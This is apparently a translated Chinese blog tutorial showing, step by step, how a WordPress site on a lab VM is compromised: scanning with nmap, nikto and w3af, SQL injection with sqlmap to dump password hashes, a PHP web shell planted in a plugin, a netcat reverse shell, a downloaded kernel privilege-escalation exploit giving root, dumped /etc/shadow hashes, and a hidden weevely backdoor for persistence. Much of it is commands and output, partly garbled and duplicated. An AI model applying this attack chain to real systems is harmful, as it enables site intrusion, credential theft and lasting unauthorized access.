这个问题的答案可能很难确定，仅仅是因为有很多方法可以入侵一个网站。我们在本文中的目的是向您展示黑客在定位和入侵您的网站时最常用的技术！

假设这是您的站点：hack-test.com

让我们ping这个站点来获取服务器IP：

现在我们有 173.236.138.113 - 这是我们的目标站点托管的服务器 IP。

要查找托管在同一服务器上的其他站点，我们将使用 sameip.org：

托管在 IP 地址 173.236.138.113 上的相同 IP
26 站点

ID 领域 网站链接

我们需要有关您网站的更多信息，例如：

DNS 记录（A、NS、TXT、MX 和 SOA）
Web 服务器类型（Apache、IIS、Tomcat）
注册商（拥有您的域名的公司）
您的姓名、地址、电子邮件和电话
您的站点使用的脚本（php、asp、asp.net、jsp、cfm）
您的服务器操作系统（Unix、Linux、Windows、Solaris）
您的服务器打开 Internet 端口（80、443、21 等）
让我们从查找您站点的 DNS 记录开始。我们将使用“Who.is”网站来实现这一目标：

我们发现您的站点 DNS 记录是：

HACK-TEST.COM DNS 记录

让我们确定 Web 服务器类型：

如您所见，您的站点 Web 服务器是 Apache。我们将在稍后确定其版本。

HACK-TEST.COM 网站信息

IP：173.236.138.113
网站状态：活动
服务器类型：Apache
Alexa 趋势/排名：1 个月：3,213,968 3 个月：2,161,753
每次访问页面浏览量：1 个月：2.0 3 个月：3.7

现在是时候找到您的 Doman Registrar 以及您的姓名、地址、电子邮件和电话：

我们现在已经获得了您的注册商和其他有关您的重要信息。我们可以使用 backtrack 5 R1 中名为 Whatweb 的酷工具找到您站点上的脚本类型（操作系统类型、Web 服务器版本）：

现在我们发现您的站点正在使用一个名为 WordPress 的著名 php 脚本，您的服务器操作系统是 Fedora Linux，您的 Web 服务器版本是 (apache 2.2.15)，让我们在您的服务器中找到开放的端口。

为此，我们将使用 nmap：

1 – 查找在服务器上运行的服务

[源代码]

root@bt:/# nmap -sV hack-test.comStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-12-28 06:39 EET
Nmap scan report for hack-test.com (192.168.1.2)
Host is up (0.0013s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd 2.2.15 ((Fedora))
MAC Address: 00:0C:29:01:8A:4D (VMware)Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 11.56 seconds

[源代码]

root@bt:/# nmap -O hack-test.comStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-12-28 06:40 EET
Nmap scan report for hack-test.com (192.168.1.2)
Host is up (0.00079s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE
22/tcp closed ssh80/tcp open http
MAC Address: 00:0C:29:01:8A:4D (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.22 (Fedora Core 6)
Network Distance: 1 hopOS detection performed. Please report any incorrect results at http://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 7.42 seconds
[/sourcecode]Only port 80 is open and OS is Linux 2.6.22(Fedora Core 6)Now that we have gathered all the important information about your site, let’s scan it for vulnerabilities likeSql injection – Blind sql injection – LFI – RFI – XSS – CSRF, and so forth.We will use Nikto.pl to gather info, perhaps, some vulnerabilities:[sourcecode]
root@bt:/pentest/web/nikto# perl nikto.pl -h http://hack-test.com– Nikto v2.1.4—————————————————————————+ Target IP: 192.168.1.2
+ Target Hostname: hack-test.com
+ Target Port: 80
+ Start Time: 2011-12-29 06:50:03—————————————————————————+ Server: Apache/2.2.15 (Fedora)
+ ETag header found on server, inode: 12748, size: 1475, mtime: 0x4996d177f5c3b
+ Apache/2.2.15 appears to be outdated (current is at least Apache/2.2.17). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 6448 items checked: 1 error(s) and 6 item(s) reported on remote host
+ End Time: 2011-12-29 06:50:37 (34 seconds)—————————————————————————+ 1 host(s) tested
[/sourcecode]We will also use W3AF. You can find this tool in backtrack 5 R1[sourcecode]
root@bt:/pentest/web/w3af# ./w3af_guiStarting w3af, running on:
Python version:
2.6.5 (r265:79063, Apr 16 2010, 13:57:41)
[GCC 4.4.3]
GTK version: 2.20.1
PyGTK version: 2.17.0w3af – Web Application Attack and Audit Framework
Version: 1.2
Revision: 4605
Author: Andres Riancho and the w3af team.

[源代码]

root@bt:/pentest/web/w3af# ./w3af_guiStarting w3af, running on:
Python version:
2.6.5 (r265:79063, Apr 16 2010, 13:57:41)
[GCC 4.4.3]
GTK version: 2.20.1
PyGTK version: 2.17.0w3af – Web Application Attack and Audit Framework
Version: 1.2
Revision: 4605
Author: Andres Riancho and the w3af team.
w3af – Web

我们将插入我们的站点 URL 并选择完整审核选项：

一段时间后，扫描将完成，您将看到

您的站点容易受到 sql 注入、xss 和其他攻击！

我们来调查一下sql注入漏洞：

http://hack-test.com/Hackademic_RTB1/?cat=d%27z%220

这是易受攻击的 url，cat 是易受攻击的参数。

那么，让我们利用这个漏洞：

我们会发现利用这个漏洞失败了，所以我们将使用sqlmap到job中并转储我们需要破解这个站点的所有数据库信息J

将 sqlmap 与 –u url 一起使用

几秒钟后你会看到

输入 n 并按回车键继续

如您所见，您的站点容易受到基于错误的 sql 注入的攻击，并且您的 mysql 数据库版本为 5

让我们通过添加“-dbs”来查找您站点中的所有数据库

现在我们找到了 3 个数据库

我们将通过添加“–D wordpress –tables”来转储 wordpress 数据库表

我们会找到所有的 wordpress 表格

我们要转储“wp_users”表，所以我们会找到所有用户（admin？）信息（用户名和密码hash）并尝试破解hash并进入wordpress控制面板（wp-admin）

我们将“wp_users”表的列添加“-T wp_users –columns”

我们会找到 22 列

我们只需要转储到列，因此我们将通过添加转储（user_login 和 user_pass）列

-C user_login,user_pass –dump

我们会找到重要的信息；我们现在找到了用户并传递了哈希值

但我们想破解这些哈希来清除文本密码。我们将使用在线网站“ http://www.onlinehashcrack.com/free-hash-reverse.php ”

并尝试破解这个哈希7CBB3252BA6B7E9C422FAC5334D22054

明文密码是q1w2e3

用户名为“GeorgeMiller”

我们将在“wp-admin”中使用这些详细信息登录

我们在！

好的，让我们尝试上传 php web shell 以在您的站点服务器上运行一些 linux 命令J

我们将在 wordpress 中编辑一个名为“ Textile ”的插件或您在插件页面中找到的任何插件。

并选择编辑它

我们将插入 php web shell 而不是真正的插件。完成此操作后，我们将点击“更新文件”并浏览到我们的新 php shell

哇，php shell 有效。现在我们可以操作您的站点文件，但我们只想在您的服务器上获得 root 权限并入侵所有其他站点。

我们将从php web shell中选择“back-connect”选项卡，并在端口“5555”上重新连接到我们的ip“192.168.1.6”

但是在我们点击连接之前，我们首先让 netcat 监听攻击者机器上的“5555”端口

现在点击连接，你会看到：

让我们尝试一些 linux 命令

[源代码]
id

uid=48(apache) gid=489(apache) 组=489(apache)

密码

/var/www/html/Hackademic_RTB1/wp-content/plugins

uname -a

Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45 EST 2009 i686 i686 i386 GNU/Linux
[/ sourcecode ]

id 命令用于向我们显示用户 id、组。

pwd 命令用于向我们显示我们在服务器上的当前路径

uname –a 命令用于向我们展示一些内核版本信息

好的，现在我们知道服务器内核版本是 2.6.31.5-127.fc12.1686

让我们在exploit-db.com中搜索此版本或更新版本的exploit

我们将输入“kernel 2.6.31”

这些都不符合要求，因为它们都不是特权升级漏洞。然而，下一个是。

http://www.exploit-db.com/exploits/15285

我打开这个网址并复制了这个链接

http://www.exploit-db.com/download/15285

并在我的 netcat shell 上执行此命令

[源代码]

wget http://www.exploit-db.com/download/15285 -O roro.c
–2011-12-28 00:48:01– http://www.exploit-db.com/download/15285
Resolving www.exploit-db.com… 199.27.135.111, 199.27.134.111
Connecting to www.exploit-db.com|199.27.135.111|:80… connected.
HTTP request sent, awaiting response… 301 Moved Permanently
Location: http://www.exploit-db.com/download/15285/ [following]
–2011-12-28 00:48:02– http://www.exploit-db.com/download/15285/
Connecting to www.exploit-db.com|199.27.135.111|:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 7154 (7.0K) [application/txt]
Saving to: `roro.c’0K …… 100% 29.7K=0.2s

[/源代码]

我们使用 wget 命令从exploit-db.com 获取exploit，并使用-O 将其重命名为roro.c

注意： linux内核漏洞利用主要是用c语言开发的，所以我们将其保存在.c扩展名中，只需查看漏洞利用源代码，您就会发现

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
#include <string.h>
#include <sys/ptrace.h>
#include <sys/utsname.h>
#define RECVPORT 5555
#define SENDPORT 6666
intprep_sock(intport)
{
ints, ret;
structsockaddr_in addr;
s = socket(PF_RDS, SOCK_SEQPACKET, 0);
if(s < 0) {
printf(“[*] Could not open socket.n”);
exit(-1);
}
memset(&addr, 0, sizeof(addr));

并通过键入运行我们的漏洞利用

[源代码]

./roro[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses…
[+] Resolved rds_proto_ops to 0xe09f0b20
[+] Resolved rds_ioctl to 0xe09db06a
[+] Resolved commit_creds to 0xc044e5f1
[+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting function pointer…
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses…
[+] Resolved rds_proto_ops to 0xe09f0b20
[+] Resolved rds_ioctl to 0xe09db06a
[+] Resolved commit_creds to 0xc044e5f1
[+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting function pointer…
[*] Triggering payload…
[*] Restoring function pointer…
[/sourcecode]

然后我们输入

Id

我们会发现我们是根J

uid=0(root) gid=0(root)

我们现在可以查看 /etc/shadow 文件

[sourcecode]
cat /etc/shadow
root:$6$4l1OVmLPSV28eVCT$FqycC5mozZ8mqiqgfudLsHUk7R1EMU/FXw3pOcOb39LXekt9VY6HyGkXcLEO.ab9F9t7BqTdxSJvCcy.iYlcp0:14981:0:99999:7:::
bin:*:14495:0:99999:7:::
daemon:*:14495:0:99999:7:::
adm:*:14495:0:99999:7:::
lp:*:14495:0:99999:7:::
sync:*:14495:0:99999:7:::
shutdown:*:14495:0:99999:7:::
halt:*:14495:0:99999:7:::
mail:*:14495:0:99999:7:::
uucp:*:14495:0:99999:7:::
operator:*:14495:0:99999:7:::
games:*:14495:0:99999:7:::
gopher:*:14495:0:99999:7:::
ftp:*:14495:0:99999:7:::
nobody:*:14495:0:99999:7:::
vcsa:!!:14557::::::
avahi-autoipd:!!:14557::::::
ntp:!!:14557::::::
dbus:!!:14557::::::
rtkit:!!:14557::::::
nscd:!!:14557::::::
tcpdump:!!:14557::::::
avahi:!!:14557::::::
haldaemon:!!:14557::::::
openvpn:!!:14557::::::
apache:!!:14557::::::
saslauth:!!:14557::::::
mailnull:!!:14557::::::
smmsp:!!:14557::::::
smolt:!!:14557::::::
sshd:!!:14557::::::
pulse:!!:14557::::::
gdm:!!:14557::::::
p0wnbox.Team:$6$rPArLuwe8rM9Avwv$a5coOdUCQQY7NgvTnXaFj2D5SmggRrFsr6TP8g7IATVeEt37LUGJYvHM1myhelCyPkIjd8Yv5olMnUhwbQL76/:14981:0:99999:7:::
mysql:!!:14981::::::
[/sourcecode]And view /etc/passwd file[sourcecode]cat /etc/passwdroot:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:499:virtual console memory owner:/dev:/sbin/nologin
avahi-autoipd:x:499:498:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
rtkit:x:498:494:RealtimeKit:/proc:/sbin/nologin
nscd:x:28:493:NSCD Daemon:/:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
avahi:x:497:492:avahi-daemon:/var/run/avahi-daemon:/sbin/nologin
haldaemon:x:68:491:HAL daemon:/:/sbin/nologin
openvpn:x:496:490:OpenVPN:/etc/openvpn:/sbin/nologin
apache:x:48:489:Apache:/var/www:/sbin/nologin
saslauth:x:495:488:”Saslauthd user”:/var/empty/saslauth:/sbin/nologin
mailnull:x:47:487::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:486::/var/spool/mqueue:/sbin/nologin
smolt:x:494:485:Smolt:/usr/share/smolt:/sbin/nologin
sshd:x:74:484:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
pulse:x:493:483:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
gdm:x:42:481::/var/lib/gdm:/sbin/nologin
p0wnbox.Team:x:500:500:p0wnbox.Team:/home/p0wnbox.Team:/bin/bash
mysql:x:27:480:MySQL Server:/var/lib/mysql:/bin/bash[/sourcecode]

我们可以破解所有用户密码 “john the ripper”工具。
　　
但是我们不会这样做;我们要保持访问这个服务器我们可以任何时间来访问/黑客J
　　
我们将使用weevely小和php编码与密码保护和上传这个php后门后门到我们的服务器。
　　
让我们干起来吧

1 - weevely使用选项 :

[sourcecode]
root@bt:/pentest/backdoors/web/weevely# ./main.py –Weevely 0.3 – Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/Usage: main.py [options]Options:-h, –help show this help message and exit
-g, –generate Generate backdoor crypted code, requires -o and -p .
-o OUTPUT, –output=OUTPUT
Output filename for generated backdoor .
-c COMMAND, –command=COMMAND
Execute a single command and exit, requires -u and -p
.
-t, –terminal Start a terminal-like session, requires -u and -p .
-C CLUSTER, –cluster=CLUSTER
Start in cluster mode reading items from the give
file, in the form ‘label,url,password’ where label is
optional.
-p PASSWORD, –password=PASSWORD
Password of the encrypted backdoor .
-u URL, –url=URL Remote backdoor URL .
[/sourcecode]

2.用weevely创建一个密码为koko的php后门

[sourcecode]
root@bt:/pentest/backdoors/web/weevely# ./main.py -g -o hax.php -p kokoWeevely 0.3 – Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/+ Backdoor file ‘hax.php’ created with password ‘koko’.[/sourcecode]

3 - php后门上传到服务器使用php web层

接下来上传到服务器之后来使用它

[sourcecode]
root@bt:/pentest/backdoors/web/weevely# ./main.py -t -u http://hack-test.com/Hackademic_RTB1/wp-content/plugins/hax.php -p kokoWeevely 0.3 – Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/+ Using method ‘system()’.
+ Retrieving terminal basic environment variables .[apache@HackademicRTB1 /var/www/html/Hackademic_RTB1/wp-content/plugins]
[/sourcecode]

测试我们的 hax.php 后门

结论：
在本文中，我们学习了一些黑客正在使用的技术来定位和入侵您的网站和服务器。我希望你喜欢这篇文章并喜欢它。


【腾讯文档】赠送价值11980安全学习资料包！【点击获取】